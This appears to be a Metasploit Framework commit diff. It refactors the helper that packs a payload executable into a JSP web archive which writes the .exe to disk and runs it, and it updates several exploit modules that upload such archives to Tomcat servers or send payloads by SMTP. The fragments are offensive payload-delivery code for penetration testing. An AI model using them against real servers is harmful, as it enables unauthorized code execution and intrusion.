rework to_jsp_war a bit, fix uses, default msfencode -t war to x86/win32
git-svn-id: file:///home/svn/framework3/trunk@10397 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
2cd8b7d5e2
commit
bd1eeb3722
|
@ -97,7 +97,8 @@ module Payload
|
||||||
plat = Msf::Module::PlatformList.transform(opts['Platform'])
|
plat = Msf::Module::PlatformList.transform(opts['Platform'])
|
||||||
|
|
||||||
tmp_plat = plat.platforms
|
tmp_plat = plat.platforms
|
||||||
buf = Msf::Util::EXE.to_jsp_war(framework, arch, tmp_plat, e.encoded, {:persist => false, :template => altexe})
|
exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, e.encoded, { :template => altexe})
|
||||||
|
buf = Msf::Util::EXE.to_jsp_war(exe, {:persist => false })
|
||||||
else
|
else
|
||||||
# Serialize the generated payload to some sort of format
|
# Serialize the generated payload to some sort of format
|
||||||
buf = Buffer.transform(e.encoded, fmt)
|
buf = Buffer.transform(e.encoded, fmt)
|
||||||
|
|
|
@ -216,7 +216,8 @@ class Module < Base
|
||||||
output = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
|
output = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
|
||||||
when 'war'
|
when 'war'
|
||||||
tmp_plat = plat.platforms
|
tmp_plat = plat.platforms
|
||||||
output = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe})
|
exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :template => altexe})
|
||||||
|
output = Msf::Util::EXE.to_jsp_war(exe, { :persist => false })
|
||||||
else
|
else
|
||||||
fmt ||= "ruby"
|
fmt ||= "ruby"
|
||||||
output = Msf::Simple::Buffer.transform(raw, fmt)
|
output = Msf::Simple::Buffer.transform(raw, fmt)
|
||||||
|
|
|
@ -813,9 +813,7 @@ require 'metasm'
|
||||||
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a payload.
|
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a payload.
|
||||||
# The jsp page converts the hexdump back to a normal .exe file and places it in
|
# The jsp page converts the hexdump back to a normal .exe file and places it in
|
||||||
# the temp directory. The payload .exe file is then executed.
|
# the temp directory. The payload .exe file is then executed.
|
||||||
def self.to_jsp_war(framework, arch, plat, code='', opts={})
|
def self.to_jsp_war(exe, opts={})
|
||||||
|
|
||||||
exe = to_executable(framework, arch, plat, code, opts)
|
|
||||||
|
|
||||||
# begin <payload>.jsp
|
# begin <payload>.jsp
|
||||||
var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)
|
var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
|
|
@ -172,9 +172,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
:jsp_name => jsp_name
|
:jsp_name => jsp_name
|
||||||
})
|
})
|
||||||
else
|
else
|
||||||
@war_data = Msf::Util::EXE.to_jsp_war(framework,
|
exe = generate_payload_exe({ :code => p.encoded })
|
||||||
arch, plat,
|
@war_data = Msf::Util::EXE.to_jsp_war(exe,
|
||||||
p.encoded,
|
|
||||||
{
|
{
|
||||||
:app_name => app_base,
|
:app_name => app_base,
|
||||||
:jsp_name => jsp_name
|
:jsp_name => jsp_name
|
||||||
|
|
|
@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
|
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Exploit::EXE
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -182,16 +183,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_status("Using manually select target \"#{mytarget.name}\"")
|
print_status("Using manually select target \"#{mytarget.name}\"")
|
||||||
end
|
end
|
||||||
|
|
||||||
# set arch/platform from the target
|
|
||||||
arch = mytarget['Arch']
|
|
||||||
plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
|
|
||||||
|
|
||||||
# Generate the WAR containing the EXE containing the payload
|
# Generate the WAR containing the EXE containing the payload
|
||||||
jsp_name = rand_text_alphanumeric(4+rand(32-4))
|
jsp_name = rand_text_alphanumeric(4+rand(32-4))
|
||||||
war = Msf::Util::EXE.to_jsp_war(framework,
|
exe = generate_payload_exe
|
||||||
arch, plat,
|
war = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
|
||||||
payload.encoded,
|
|
||||||
:jsp_name => jsp_name)
|
|
||||||
|
|
||||||
app_base = rand_text_alphanumeric(4+rand(32-4))
|
app_base = rand_text_alphanumeric(4+rand(32-4))
|
||||||
query_str = "?path=/" + app_base
|
query_str = "?path=/" + app_base
|
||||||
|
|
|
@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# This module sends email messages via smtp
|
# This module sends email messages via smtp
|
||||||
#
|
#
|
||||||
include Msf::Exploit::Remote::SMTPDeliver
|
include Msf::Exploit::Remote::SMTPDeliver
|
||||||
|
include Msf::Exploit::EXE
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -142,16 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
if (target.arch.include?(ARCH_CMD))
|
if (target.arch.include?(ARCH_CMD))
|
||||||
cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")
|
cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")
|
||||||
else
|
else
|
||||||
bin = ''
|
bin = generate_payload_exe
|
||||||
|
|
||||||
if(target.arch.index(ARCH_PPC))
|
|
||||||
bin = Msf::Util::EXE.to_osx_ppc_macho(framework, payload.encoded)
|
|
||||||
end
|
|
||||||
|
|
||||||
if(target.arch.index(ARCH_X86))
|
|
||||||
bin = Msf::Util::EXE.to_osx_x86_macho(framework, payload.encoded)
|
|
||||||
end
|
|
||||||
|
|
||||||
cmd = Rex::Text.encode_base64(bin, "\r\n")
|
cmd = Rex::Text.encode_base64(bin, "\r\n")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
|
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Exploit::EXE
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -55,13 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
arch = target['Arch']
|
|
||||||
plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]]
|
|
||||||
|
|
||||||
# Generate the WAR containing the EXE containing the payload
|
# Generate the WAR containing the EXE containing the payload
|
||||||
app_base = rand_text_alphanumeric(4+rand(32-4))
|
app_base = rand_text_alphanumeric(4+rand(32-4))
|
||||||
jsp_name = rand_text_alphanumeric(8+rand(8))
|
jsp_name = rand_text_alphanumeric(8+rand(8))
|
||||||
war_data = Msf::Util::EXE.to_jsp_war(framework, arch, plat, payload.encoded, :jsp_name => jsp_name)
|
|
||||||
|
exe = generate_payload_exe
|
||||||
|
war_data = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
|
||||||
|
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
{
|
{
|
||||||
|
|
|
@ -50,7 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
# Generate the ASP containing the EXE containing the payload
|
# Generate the ASP containing the EXE containing the payload
|
||||||
asp = Msf::Util::EXE.to_win32pe_asp(framework,payload.encoded)
|
exe = generate_payload_exe
|
||||||
|
asp = Msf::Util::EXE.to_exe_asp(exe)
|
||||||
path = datastore['PATH'].gsub('%RAND%', rand(0x10000000).to_s)
|
path = datastore['PATH'].gsub('%RAND%', rand(0x10000000).to_s)
|
||||||
path_tmp = path.gsub(/\....$/, ".txt")
|
path_tmp = path.gsub(/\....$/, ".txt")
|
||||||
|
|
||||||
|
|
|
@ -273,8 +273,11 @@ case cmd
|
||||||
asp = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
|
asp = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
|
||||||
write_encoded(asp)
|
write_encoded(asp)
|
||||||
when 'war'
|
when 'war'
|
||||||
tmp_plat = plat.platforms
|
arch ||= [ ARCH_X86 ]
|
||||||
war = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe})
|
tmp_plat = plat.platforms if plat
|
||||||
|
tmp_plat ||= Msf::Module::PlatformList.transform('win')
|
||||||
|
exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :insert => inject, :template => altexe })
|
||||||
|
war = Msf::Util::EXE.to_jsp_war(exe, { :persist => false })
|
||||||
write_encoded(war)
|
write_encoded(war)
|
||||||
else
|
else
|
||||||
fmt ||= "ruby"
|
fmt ||= "ruby"
|
||||||
|
|
|
@ -156,7 +156,8 @@ if (cmd =~ /^(p|y|r|d|c|j|x|b|v|w)/)
|
||||||
arch = payload.arch
|
arch = payload.arch
|
||||||
plat = payload.platform.platforms
|
plat = payload.platform.platforms
|
||||||
|
|
||||||
exe = Msf::Util::EXE.to_jsp_war($framework, arch, plat, buf)
|
exe = Msf::Util::EXE.to_executable($framework, arch, plat, buf)
|
||||||
|
exe = Msf::Util::EXE.to_jsp_war(exe)
|
||||||
|
|
||||||
|
|
||||||
if(exe)
|
if(exe)
|
||||||
|
|
Loading…
Reference in New Issue